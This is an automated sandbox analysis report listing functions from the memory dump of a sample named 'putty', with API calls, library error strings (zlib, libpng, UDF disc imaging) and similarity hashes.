Function 00344560 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 215COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 003445B8

Part of subcall function 003B9B62: __FF_MSGBANNER.LIBCMT ref: 003B9B7B
Part of subcall function 003B9B62: __NMSG_WRITE.LIBCMT ref: 003B9B82
Part of subcall function 003B9B62: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,003BE372,00000000,00000001,00000000,?,003CA150,00000018,00402B88,0000000C,003CA1E0), ref: 003B9BA7

_memset.LIBCMT ref: 003445D3
__setjmp3.LIBCMT ref: 00344641
ExitProcess.KERNEL32 ref: 0034464E
_free.LIBCMT ref: 003447D2
_free.LIBCMT ref: 00344823

Strings

Unknown zlib error, xrefs: 00344781
zlib stream error, xrefs: 00344773
zlib memory error, xrefs: 0034476C
Can't set both read_data_fn and write_data_fn in the same structure, xrefs: 00344881
zlib version error, xrefs: 0034477A

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _free$AllocateExitHeapProcess__setjmp3_malloc_memset
String ID: Can't set both read_data_fn and write_data_fn in the same structure$Unknown zlib error$zlib memory error$zlib stream error$zlib version error
API String ID: 903731697-762526621
Opcode ID: bf893fd55b45cedc2413827301239c9163522e16de049d7182f9e72f340107bb
Instruction ID: b6b57eb67c426eef661040039e15f26f3f86eeb1d68df5cbf53d0900c46d9743
Opcode Fuzzy Hash: bf893fd55b45cedc2413827301239c9163522e16de049d7182f9e72f340107bb
Instruction Fuzzy Hash: 00915A74E012598BEB25EF54D998BAEB7F5BB44300F1541FAD90DAB381DB31AE818F40

Function 003455E0 Relevance: 18.2, APIs: 12, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00346550: _memset.LIBCMT ref: 003465BD

_free.LIBCMT ref: 0034564C
_free.LIBCMT ref: 00345671
_free.LIBCMT ref: 00345696
_free.LIBCMT ref: 003456BB
_free.LIBCMT ref: 003456E0
_free.LIBCMT ref: 00345711
_free.LIBCMT ref: 0034574C
_free.LIBCMT ref: 00345784
_free.LIBCMT ref: 003457ED
_free.LIBCMT ref: 00345627

Part of subcall function 003B93AA: HeapFree.KERNEL32(00000000,00000000,?,003B9472,?), ref: 003B93C0
Part of subcall function 003B93AA: GetLastError.KERNEL32(?,?,003B9472,?), ref: 003B93D2

_free.LIBCMT ref: 00345812
_memset.LIBCMT ref: 00345843

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _free$_memset$ErrorFreeHeapLast
String ID:
API String ID: 622543930-0
Opcode ID: 7be145b2e9090a3ec03a0e510a47ec2c3ac9266532bf53222a6de71811fadb3f
Instruction ID: d4eebbc3cf975c8918f8f99ee72c59c7cce3bc8bf9bc662bba78750c9f0e811f
Opcode Fuzzy Hash: 7be145b2e9090a3ec03a0e510a47ec2c3ac9266532bf53222a6de71811fadb3f
Instruction Fuzzy Hash: 1C7180B5A01A0287DF29DE65CCD5BAA33D96F41310F0E057CAD0E8F647EA29F905C7A1

Function 003B82A7 Relevance: 18.1, APIs: 12, Instructions: 139COMMON

Download Yara Rule

APIs

____lc_handle_func.LIBCMT ref: 003B82DB
____lc_codepage_func.LIBCMT ref: 003B82E3
__GetLocaleForCP.LIBCPMT ref: 003B830B
____mb_cur_max_l_func.LIBCMT ref: 003B8321
MultiByteToWideChar.KERNEL32(00000001,00000009,?,00000002,?,00000000,?,?,?,?,0032943A,?), ref: 003B8340
____mb_cur_max_l_func.LIBCMT ref: 003B834E
___pctype_func.LIBCMT ref: 003B8373
____mb_cur_max_l_func.LIBCMT ref: 003B8399
____mb_cur_max_l_func.LIBCMT ref: 003B83B1
____mb_cur_max_l_func.LIBCMT ref: 003B83C9
MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,?,00000000,?,?,?,?,0032943A,?), ref: 003B83D6
MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000001,?,00000000,?,?,?,?,0032943A,?), ref: 003B8407

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: ____mb_cur_max_l_func$ByteCharMultiWide$Locale____lc_codepage_func____lc_handle_func___pctype_func
String ID:
API String ID: 3819326198-0
Opcode ID: fd4ce06ffe3dca3357286f5ee41c9df488707111a8b47bcef2acca80c154876a
Instruction ID: 525f54bedef197f5f7004ac202fe12a82a608a194260591d69621214c940d60d
Opcode Fuzzy Hash: fd4ce06ffe3dca3357286f5ee41c9df488707111a8b47bcef2acca80c154876a
Instruction Fuzzy Hash: 0341C139104245AEDB231F31DC41BFA3BACAF41B19F298826FA59CE991EF30C950DB50

Function 00350C20 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 232stringCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00350C9F
lstrlenA.KERNEL32(?,?,00000000), ref: 00350D3E
lstrlenA.KERNEL32(00000000,?,00000000), ref: 00350D5D
lstrlenA.KERNEL32(00000000,?,00000000), ref: 00350D70
lstrlenA.KERNEL32(?,?,00000000), ref: 00350D84
_memmove.LIBCMT ref: 00350DCA
_memmove.LIBCMT ref: 00350DF2
_memmove.LIBCMT ref: 00350E11
_memmove.LIBCMT ref: 00350E4A

Strings

text compression mode is out of range, xrefs: 00350E7E

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memmove$lstrlen
String ID: text compression mode is out of range
API String ID: 1331579935-998488343
Opcode ID: f423d88fc3600e2a89da4bd407838a8ad75e67322a4eda2e40cb04ca0b0c0ab5
Instruction ID: cf6ba360d463e8a39673180843991eb762adaa4dfe0a4fa1b4a744e9bd3c5d3f
Opcode Fuzzy Hash: f423d88fc3600e2a89da4bd407838a8ad75e67322a4eda2e40cb04ca0b0c0ab5
Instruction Fuzzy Hash: A5918A70A00A06AFCB09CFA8D980BAABBB4FF44311F154669E809DB711E735F955CBD0

Function 00348140 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 181COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0034830B

Part of subcall function 003B9B62: __FF_MSGBANNER.LIBCMT ref: 003B9B7B
Part of subcall function 003B9B62: __NMSG_WRITE.LIBCMT ref: 003B9B82
Part of subcall function 003B9B62: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,003BE372,00000000,00000001,00000000,?,003CA150,00000018,00402B88,0000000C,003CA1E0), ref: 003B9BA7

_memmove.LIBCMT ref: 0034834B
_free.LIBCMT ref: 00348370

Part of subcall function 003B93AA: HeapFree.KERNEL32(00000000,00000000,?,003B9472,?), ref: 003B93C0
Part of subcall function 003B93AA: GetLastError.KERNEL32(?,?,003B9472,?), ref: 003B93D2

Strings

Unknown zTXt compression type @1, xrefs: 003482C9
invalid chunklength, xrefs: 0034816F
Out of Memory, xrefs: 00348320
Not enough memory to decompress chunk, xrefs: 003482A0
png_inflate logic error, xrefs: 0034827F
Exceeded size limit while expanding chunk, xrefs: 003481C7

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLast_free_malloc_memmove
String ID: Exceeded size limit while expanding chunk$Not enough memory to decompress chunk$Out of Memory$Unknown zTXt compression type @1$invalid chunklength$png_inflate logic error
API String ID: 3054972123-3108889705
Opcode ID: cf4793a88635b4c892deb536a1caa2d5913912c5b4dfe0ea5e2d9cf633ddec90
Instruction ID: 457f5019be079cdbcb3cdff71915d91df31830e95724feb7fca10af0ea68656c
Opcode Fuzzy Hash: cf4793a88635b4c892deb536a1caa2d5913912c5b4dfe0ea5e2d9cf633ddec90
Instruction Fuzzy Hash: 1551B179E006159BCB2ADF2488817FEB3E5AF94310F0405A9E9595F300DF70BD818BD1

Function 00328230 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 181stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000026,00000000,00000000), ref: 0032839F
AreFileApisANSI.KERNEL32(00000000,?,00000001), ref: 003283B0
WideCharToMultiByte.KERNEL32(00000001), ref: 003283BC
lstrlenW.KERNEL32(?,?,00000026,00000000,00000000), ref: 003283DC
AreFileApisANSI.KERNEL32(00000000,?,00000001), ref: 003283ED
WideCharToMultiByte.KERNEL32(00000001), ref: 003283F9
lstrlenW.KERNEL32(?,?,00000026,00000000,00000000), ref: 00328419
AreFileApisANSI.KERNEL32(00000000,?,00000001), ref: 0032842A
WideCharToMultiByte.KERNEL32(00000001), ref: 00328436

Strings

, xrefs: 003282D5

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: ApisByteCharFileMultiWidelstrlen
String ID:
API String ID: 3772505333-399585960
Opcode ID: 947aa76aa9a475d7ebf812c1b96c86066d49009c304620dd78719f9eb707d844
Instruction ID: 365621df25ae5822ea45fc8026efdfbac48dcee4bc297cb4924cd56dbc2b9f52
Opcode Fuzzy Hash: 947aa76aa9a475d7ebf812c1b96c86066d49009c304620dd78719f9eb707d844
Instruction Fuzzy Hash: 0E7146719412189FDB55CF68D885BAA7BB9FB48700F0885BAEC0DDF246EA315A448B60

Function 00350FC0 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 179stringCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00351019
lstrlenA.KERNEL32(?,?,?,?,00349A76,?,?,?), ref: 0035107B

Strings

Out of Memory, xrefs: 003511AB
Out of memory while processing sPLT chunk, xrefs: 003510D3, 0035110D
No memory for sPLT palettes, xrefs: 00350FF5

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memmovelstrlen
String ID: No memory for sPLT palettes$Out of Memory$Out of memory while processing sPLT chunk
API String ID: 3428047308-2679876900
Opcode ID: c4363c80f09f26467566d11df075a3105d796fa55e7f95fff037bec71e0ea9fb
Instruction ID: 00e5c2a782b22f689e040a61531f14aef3f7ebe5c38f5708a1a68fce178f2356
Opcode Fuzzy Hash: c4363c80f09f26467566d11df075a3105d796fa55e7f95fff037bec71e0ea9fb
Instruction Fuzzy Hash: 3F51F371E006019BDB0ADFA4C880BAAB7E9EF40311F1941A9ED09AB351DB31AE44CBD0

Function 00336D40 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 337COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 00336DB3

Part of subcall function 003B9164: RaiseException.KERNEL32(Z 2,?,D747BB9A,003DD6C4,0032205A,?,00402D5C,?,D747BB9A), ref: 003B91A6

Part of subcall function 00337330: std::_Lockit::_Lockit.LIBCPMT ref: 003373E1

Part of subcall function 00323180: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000,D747BB9A,00000000,00000000,00000000,?,?,003DA563,000000FF), ref: 003231E9
Part of subcall function 00323180: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,00000000,?,?,003DA563,000000FF,?,003236F4), ref: 00323235

__CxxThrowException@8.LIBCMT ref: 00336E3B
__CxxThrowException@8.LIBCMT ref: 00336EFC

Part of subcall function 003230A0: lstrlenW.KERNEL32(?,D747BB9A,?,?,?,Cannot close previously open file handle.), ref: 003230F4
Part of subcall function 003230A0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,Cannot close previously open file handle.), ref: 00323114
Part of subcall function 003230A0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,00000000,?,?,?,Cannot close previously open file handle.), ref: 0032315B

__CxxThrowException@8.LIBCMT ref: 00336F93

Part of subcall function 00331140: _memset.LIBCMT ref: 0033116E
Part of subcall function 00331140: GetTimeZoneInformation.KERNEL32(?,?,CCCCCCC3,?), ref: 003311CB

Part of subcall function 003313C0: _memset.LIBCMT ref: 003313F6
Part of subcall function 003313C0: GetTimeZoneInformation.KERNEL32(?,CCCCCCC3,?,CCCCCCEB), ref: 00331451
Part of subcall function 003313C0: _memset.LIBCMT ref: 003314E1
Part of subcall function 003313C0: _memset.LIBCMT ref: 0033150B

Strings

File data is too large for UDF, current length is , xrefs: 00336F40
Cannot write UDF partition because no space has been reserved for it., xrefs: 00336D95
UDF partition is too large, current length is , xrefs: 00336DE8
Error during sector space allocation, start of UDF main descriptors , xrefs: 00336EA9
sectors., xrefs: 00336DCB, 00336F34

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: ByteCharException@8MultiThrowWide_memset$InformationTimeZone$ExceptionLockitLockit::_Raiselstrlenstd::_
String ID: sectors.$Cannot write UDF partition because no space has been reserved for it.$Error during sector space allocation, start of UDF main descriptors $File data is too large for UDF, current length is $UDF partition is too large, current length is
API String ID: 2983969297-3054542940
Opcode ID: d31cf0788cb72e078317abc9c2b1302ef71360d559d6073eb2fe090e8d13b772
Instruction ID: 2825849aaa6d2ee72320ab75411c04792307fdd5c712bb2495ccf3daac21e673
Opcode Fuzzy Hash: d31cf0788cb72e078317abc9c2b1302ef71360d559d6073eb2fe090e8d13b772
Instruction Fuzzy Hash: C5D189B1504741AFC316DF24D881E9BB3E8FF88314F008A19F5999B692DB74E944CBE2

Function 00349836 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0034988C
_free.LIBCMT ref: 003498E6

Strings

sPLT chunk has bad length, xrefs: 0034994E
sPLT chunk too long, xrefs: 00349970
malformed sPLT chunk, xrefs: 003498EE
sPLT chunk requires too much memory, xrefs: 00349997

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _free
String ID: malformed sPLT chunk$sPLT chunk has bad length$sPLT chunk requires too much memory$sPLT chunk too long
API String ID: 269201875-2587502553
Opcode ID: 0f0d1eda3a23ba734e5f7b7f53c42461ec94d2b00b071527e5516a9233742dfb
Instruction ID: 5d2e9ca5897287f9ac9c11cd74a84f4b264acfa431c617f6ee4c3532837b88d8
Opcode Fuzzy Hash: 0f0d1eda3a23ba734e5f7b7f53c42461ec94d2b00b071527e5516a9233742dfb
Instruction Fuzzy Hash: FA71A76160864207CB27DBB898913FBB7E1EF96311F08417FE89DCB341E729A911C791

Function 0033F0D0 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 200COMMON

Download Yara Rule

APIs

Part of subcall function 00321780: std::_Xinvalid_argument.LIBCPMT ref: 0032179A

Part of subcall function 003421D0: _memset.LIBCMT ref: 0034220B
Part of subcall function 003421D0: GetVersionExW.KERNEL32(?), ref: 00342224

_memset.LIBCMT ref: 0033F1EA
AreFileApisANSI.KERNEL32(00000001,?,?,?,00000009,?,?,00000006,?,000000C0,00000001,D747BB9A), ref: 0033F270
MultiByteToWideChar.KERNEL32(00000001,?,?,00000006,?,000000C0,00000001,D747BB9A), ref: 0033F278
AreFileApisANSI.KERNEL32(00000001,?,?,?,00000011,?,?,00000006,?,000000C0,00000001,D747BB9A), ref: 0033F2AC
MultiByteToWideChar.KERNEL32(00000001,?,?,00000006,?,000000C0,00000001,D747BB9A), ref: 0033F2B4
AreFileApisANSI.KERNEL32(00000001,?,?,?,00000005,?,?,00000006,?,000000C0,00000001,D747BB9A), ref: 0033F2EA
MultiByteToWideChar.KERNEL32(00000001,?,?,00000006,?,000000C0,00000001,D747BB9A), ref: 0033F2F2

Strings

$, xrefs: 0033F21A
[mmcdevice]: unable to obtain device inquiry data from %d,%d,%d., xrefs: 0033F313

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: ApisByteCharFileMultiWide$_memset$VersionXinvalid_argumentstd::_
String ID: $$[mmcdevice]: unable to obtain device inquiry data from %d,%d,%d.
API String ID: 3237068804-545374421
Opcode ID: 4b68a82ecc8c5d7f32c017560d542eff96a8cb83976a29461e94bfcde1f1dd62
Instruction ID: 0b72bba3e8e59172f674941d01734d1c7cf77030cdad7eb7d2e1d00172d8e6a9
Opcode Fuzzy Hash: 4b68a82ecc8c5d7f32c017560d542eff96a8cb83976a29461e94bfcde1f1dd62
Instruction Fuzzy Hash: 78815A709007099FD755CF78C845BABBBF9FF48300F108A6EE59AD7651EBB0A9448B90

Function 0033D470 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 0033D4F2

Part of subcall function 003B9164: RaiseException.KERNEL32(Z 2,?,D747BB9A,003DD6C4,0032205A,?,00402D5C,?,D747BB9A), ref: 003B91A6

Part of subcall function 00337330: std::_Lockit::_Lockit.LIBCPMT ref: 003373E1

Part of subcall function 00323180: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000,D747BB9A,00000000,00000000,00000000,?,?,003DA563,000000FF), ref: 003231E9
Part of subcall function 00323180: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,00000000,?,?,003DA563,000000FF,?,003236F4), ref: 00323235

__CxxThrowException@8.LIBCMT ref: 0033D53C

Part of subcall function 003230A0: lstrlenW.KERNEL32(?,D747BB9A,?,?,?,Cannot close previously open file handle.), ref: 003230F4
Part of subcall function 003230A0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,Cannot close previously open file handle.), ref: 00323114
Part of subcall function 003230A0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,00000000,?,?,?,Cannot close previously open file handle.), ref: 0032315B

__CxxThrowException@8.LIBCMT ref: 0033D669

Strings

The path table is too large, , xrefs: 0033D604
and , xrefs: 0033D5F8
bytes., xrefs: 0033D5DA
Unable to calculate joliet path table size., xrefs: 0033D51E
Unable to calculate path table size., xrefs: 0033D4D4

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

